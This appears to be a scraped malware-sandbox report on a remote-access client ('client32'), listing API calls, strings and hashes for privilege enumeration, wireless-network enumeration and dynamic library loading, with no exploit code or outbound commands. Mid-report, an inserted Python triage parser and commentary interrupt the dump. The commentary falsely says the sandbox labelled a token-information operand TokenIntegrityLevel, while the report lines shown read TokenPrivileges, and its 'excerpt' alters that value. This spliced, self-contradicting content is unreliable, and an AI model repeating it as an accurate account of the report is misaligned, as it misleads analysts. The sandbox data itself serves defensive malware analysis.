• SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
• BLOCKPRINTING, xrefs: 1103D23D
• e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                                                    • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 4104443479-1830555902
                                                                                                                                                                                                    • Opcode ID: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
                                                                                                                                                                                                    • Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 68820889
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 6882088F
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 68820892
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6882089C
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 688208B4
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(688138A8,68880C0C,?), ref: 688208C2
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR100(0000000C,688138A8,68880C0C,?), ref: 688208C9
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(688138A8,68880C0C,?), ref: 688208DC
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6882092E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentProcess$??2@AcquireConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@DuplicateErrorExceptionHandleLastLock@details@ReaderThrowWrite@_Writerstd::exception::exception
                                                                                                                                                                                                    • String ID: eventObject
                                                                                                                                                                                                    • API String ID: 1946344800-1680012138
                                                                                                                                                                                                    • Opcode ID: 6176bd2fa41af6e340e9dbcc560229ac7e7df25a8b23bffe64ae04dd6e72da4b
                                                                                                                                                                                                    • Instruction ID: 2bd856b58c00fe2a685455103988dbf33bfc863bfb512e90ff4466a8e814de5b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6176bd2fa41af6e340e9dbcc560229ac7e7df25a8b23bffe64ae04dd6e72da4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6319EB5A00219EFDB10DFA8C994A9EBBF8FF09350B90492AE425D7640D770E954CBE0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544
                                                                                                                                                                                                    • IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$FreeString
                                                                                                                                                                                                    • String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
                                                                                                                                                                                                    • API String ID: 2011556836-2400621309
                                                                                                                                                                                                    • Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                                                                                                    • Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • PostMessageA.USER32(0000FFFF,0000C1E7,00000000,00000000), ref: 1104B225
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,0000048F,00000032,00000000), ref: 1104B256
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000483,00000000,00000000), ref: 1104B268
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,0000048F,000000C8,00000000), ref: 1104B27C
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000483,00000001,?), ref: 1104B293
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000800,00000000,00000000), ref: 1104B2A4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePost$__wcstoi64
                                                                                                                                                                                                    • String ID: Client$UnloadMirrorOnEndView$tVPq
                                                                                                                                                                                                    • API String ID: 1802880851-2026197083
                                                                                                                                                                                                    • Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                                                                                    • Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
• OpenProcessToken.ADVAPI32(00000000), ref: 11027336
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,00000000,?), ref: 11027358
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?), ref: 11027378
• LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
• _free.LIBCMT ref: 110273C4
• CloseHandle.KERNEL32(?), ref: 110273D6
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege_free
• String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
• API String ID: 2058255784-3275751932
• Opcode ID: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
• Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
• Opcode Fuzzy Hash: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
• Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1
APIs
• GetModuleHandleA.KERNEL32(00000000), ref: 6882AA6B
• GetModuleFileNameW.KERNEL32(687D0000,?,00000104), ref: 6882AA87
• LoadLibraryW.KERNEL32(?), ref: 6882AA98
• GetLastError.KERNEL32 ref: 6882AAAF
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6882AACA
• _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 6882AADB
• CreateThread.KERNEL32(00000000,-00000018,68820EC3,00010000,68820EB1,?), ref: 6882AB1D
• GetLastError.KERNEL32 ref: 6882AB27
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6882AB3F
• _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 6882AB4D
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
• String ID:
• API String ID: 475412-0
• Opcode ID: c8f0fa7b4d689891c6b7367278d2cec09e5e5ad50f069a1e8a97480d7b1f81ff
• Instruction ID: c50221664dd21c7308b983b24c4b64297e29fbaa0e5c7e69e068bd7fb770ce36
• Opcode Fuzzy Hash: c8f0fa7b4d689891c6b7367278d2cec09e5e5ad50f069a1e8a97480d7b1f81ff
• Instruction Fuzzy Hash: 2421F171A40209ABDF04EFA4CD59BAE77B8BF05340F804879E526E6140DB34DA44CBA0
APIs
  • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
• GetTickCount.KERNEL32 ref: 11057136
  • Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
  • Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
  • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
  • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
  • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
  • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
• GetTickCount.KERNEL32 ref: 11057293
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$CountTick$LibraryLoad__wcstoi64
• String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
• API String ID: 1442689885-2337161965
• Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
• Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
• Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
• Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1
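The three entries above (privilege enumeration through OpenProcessToken, GetTokenInformation and LookupPrivilegeNameA; the LoadLibraryW/CreateThread wrapper that raises Concurrency::scheduler_resource_allocation_error on failure; and the NC_WIRELESS routine that resolves wlanapi.dll exports with LoadLibraryA/GetProcAddress) are the kind of listing an analyst has to read across hundreds of functions in a report like this. What follows is an added Python example, not Joe Sandbox code and not part of this report: it parses the "APIs", "Joe Sandbox IDA Plugin" and "Similarity" blocks into records and derives triage signals from the API sequence. The line grammar is inferred from the entries on this page, the excerpt embedded in the block is a constructed, trimmed copy of those three entries, and the signal names (dynamic_api_resolution, privilege_enumeration, timed_section, thread_start) are the example's own. The sandbox annotated the GetTokenInformation class operand as 00000003(TokenIntegrityLevel); in winnt.h the value 3 is TokenPrivileges (TokenIntegrityLevel is 25), which the LookupPrivilegeNameA call that follows and the format string "Luid Low=%x, High=%x, Attr=%x, name=%s" bear out, so the excerpt keeps that raw annotation and the decoder trusts only the numeric value.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt: three entries from this report, trimmed to what the parser needs.
# The GetTokenInformation class operand keeps the label the sandbox emitted so that the
# decoder can show the numeric value is what to trust.  Raw string: one String ID is a path.
REPORT_EXCERPT = r"""
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
• OpenProcessToken.ADVAPI32(00000000), ref: 11027336
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
• LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
• _free.LIBCMT ref: 110273C4
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
APIs
• LoadLibraryW.KERNEL32(?), ref: 6882AA98
• CreateThread.KERNEL32(00000000,-00000018,68820EC3,00010000,68820EB1,?), ref: 6882AB1D
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• String ID:
APIs
• GetTickCount.KERNEL32 ref: 11057136
  • Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
  • Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
  • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
• GetTickCount.KERNEL32 ref: 11057293
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
"""

# One API line: optional "Part of subcall function <addr>:", then Name.MODULE(args), ref: <addr>.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w:@]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# TOKEN_INFORMATION_CLASS values from winnt.h (subset sufficient for this report).
TOKEN_INFORMATION_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
                           4: "TokenOwner", 18: "TokenElevationType",
                           20: "TokenElevation", 25: "TokenIntegrityLevel"}

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                                   # call-site address
    args: list = field(default_factory=list)   # raw operands; '?' = unresolved by the sandbox
    subcall: str = ""                          # set when the line was lifted from a subcall

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    snapshot: str = ""

def parse_entries(text):
    """Split the text at each 'APIs' header; collect calls, String ID and snapshot file."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], args, m["sub"] or ""))
        elif s.startswith("• Snapshot File:"):
            cur.snapshot = s.split(":", 1)[1].strip()
        elif s.startswith("• String ID:"):     # '$' separates strings in Joe Sandbox output
            cur.strings = [x for x in s.split(":", 1)[1].strip().split("$") if x]
    return entries

def decode_token_class(arg):
    """Resolve GetTokenInformation's class operand from its leading hex value; a label the
    sandbox appended in parentheses is ignored (here it disagrees with winnt.h)."""
    m = re.match(r"[0-9A-Fa-f]+", arg)
    return TOKEN_INFORMATION_CLASS.get(int(m.group(), 16), "unknown") if m else "unknown"

def triage(entry):
    """Signals a reviewer wants from one entry.  Only leading operand positions that map
    to real parameters are read; trailing operands in these listings are stack noise."""
    sig, names = {}, {c.name for c in entry.apis}
    resolved, lib = {}, "?"
    for c in entry.apis:
        if c.name.startswith("LoadLibrary") and c.args:
            lib = c.args[0]                                    # lpLibFileName
        elif c.name == "GetProcAddress" and len(c.args) >= 2:
            resolved.setdefault(lib, []).append(c.args[1])     # lpProcName
    if resolved:
        sig["dynamic_api_resolution"] = resolved
        if any(p.startswith("Wlan") for ps in resolved.values() for p in ps):
            sig["wireless_network_enumeration"] = True
    classes = sorted({decode_token_class(c.args[1]) for c in entry.apis
                      if c.name == "GetTokenInformation" and len(c.args) >= 2})
    if classes:
        sig["token_information_classes"] = classes
        if "TokenPrivileges" in classes and any(n.startswith("LookupPrivilegeName") for n in names):
            sig["privilege_enumeration"] = True
    if sum(c.name == "GetTickCount" for c in entry.apis) >= 2 and any("%d ms" in s for s in entry.strings):
        sig["timed_section"] = True                            # two ticks bracket timed work
    for c in entry.apis:
        if c.name == "CreateThread" and len(c.args) >= 3:
            sig["thread_start"] = c.args[2]                    # lpStartAddress
    return sig

def triage_report(text):
    """(snapshot file, signals) for every entry that produced at least one signal."""
    out = []
    for e in parse_entries(text):
        sig = triage(e)
        if sig:
            out.append((e.snapshot, sig))
    return out
```

Operand lists in these entries can be longer than the callee's prototype (GetCurrentProcess takes no arguments yet is shown with two; LoadLibraryA takes one and is shown with three), so the triage reads only the leading positions that correspond to real parameters. The excerpt drops lines the parser ignores (Memory Dump Source, hashes); running parse_entries over the full "APIs" blocks of this report yields the same records with the remaining calls included.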
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 110CF2A0
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
  • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
• _memmove.LIBCMT ref: 110CF327
• _memmove.LIBCMT ref: 110CF34B
• _memmove.LIBCMT ref: 110CF385
• _memmove.LIBCMT ref: 110CF3A1
• std::exception::exception.LIBCMT ref: 110CF3EB
• __CxxThrowException@8.LIBCMT ref: 110CF400
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                                                    • String ID: deque<T> too long
                                                                                                                                                                                                    • API String ID: 827257264-309773918
                                                                                                                                                                                                    • Opcode ID: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
                                                                                                                                                                                                    • Instruction ID: 3f2339a9076695d70661dcab859014021b6c0d6f22495f28215c516d49704129
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541E876E00115ABDB04CE68CC81BAEF7F6EF80614F19C6A9DC15D7344EA34EA418B91
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 11125060
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
  • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
• _memmove.LIBCMT ref: 111250EA
• _memmove.LIBCMT ref: 1112510E
• _memmove.LIBCMT ref: 11125148
• _memmove.LIBCMT ref: 11125164
• std::exception::exception.LIBCMT ref: 111251AE
• __CxxThrowException@8.LIBCMT ref: 111251C3
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
• Opcode ID: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
• Instruction ID: 0f323eff97a08ef0bfb1d310de9271f6685152ce05bf58ee348bace92ff13d14
• Opcode Fuzzy Hash: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
• Instruction Fuzzy Hash: 0541E776E00115ABDB54CE68CCC1AEEF7E5EF84214F69C668D81AD7344EA34EA41CBD0
APIs
  • Part of subcall function 1110B5F0: timeGetTime.WINMM ref: 1110B5FD
  • Part of subcall function 110F6220: _memset.LIBCMT ref: 110F6245
  • Part of subcall function 110F6220: GetACP.KERNEL32(0072B858,DBCS,Charset,932=*128), ref: 110F62AE
• Sleep.KERNEL32(00000032,?), ref: 1103B642
• GetDC.USER32(00000000), ref: 1103B64A
• GetPixel.GDI32(00000000,00000000,00000000), ref: 1103B657
• SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 1103B663
• ReleaseDC.USER32(00000000,00000000), ref: 1103B66C
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
